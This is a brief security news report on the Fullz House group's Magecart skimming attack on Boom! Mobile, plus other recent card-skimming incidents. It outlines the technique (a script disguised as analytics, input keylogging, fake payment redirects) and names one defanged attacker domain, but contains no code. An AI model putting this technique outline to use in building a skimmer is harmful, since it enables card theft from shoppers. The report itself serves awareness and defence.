Fullz House Introduces Enhancements into Card Skimming Attacks

Credit card skimming attacks have been continuously evolving for the past few years. Recently, a new hacking group has been observed targeting e-commerce websites using some enhanced variants of skimming attacks, which includes additional capabilities such as keylogging and phishing.

What has been discovered?

Hacking group Fullz House was observed targeting the U.S.-based mobile virtual network operator (MVNO) Boom! Mobile via Magecart attack.
  • The attackers injected a single line of JavaScript code (a credit card stealer script) on Boom's shopping cart-based e-commerce platform.
  • The script is disguised as a Google Analytics script that loads an external JavaScript library from the URL paypal-debit[.]com/cdn/ga.js.
  • In addition to the usual task of harvesting data, this script works more like a keylogger that continuously checks input fields for changes. As soon as any change is detected, it infiltrates that data.
  • This skimmer acts as a phishing tool that can redirect users from the compromised website to fake payment pages, which are designed to work like a man-in-the-middle attack, mimicking the legitimate payment portals.

Recent Magecart attacks

In the past few months, there have been some notable incidents when e-commerce sites were targeted by Magecart groups.
  • In mid-September, attackers compromised almost 2,000 online stores via a typical Magecart attack, injecting malicious code to Magento sites to steal credit card details.
  • At the beginning of September, Magecart affiliated hackers were observed using encrypted messaging service Telegram to send information about stolen credit-cards to its C2 servers.

Conclusion

Magecart attacks have proved consistently troublesome for e-commerce platforms across the globe. And frequent new enhancements indicate that attackers are not planning to slow down with their attempts. Therefore, experts recommend organizations to stay protected by keeping all the applications and third-party plugins updated and conducting regular audits for any vulnerabilities in their infrastructure.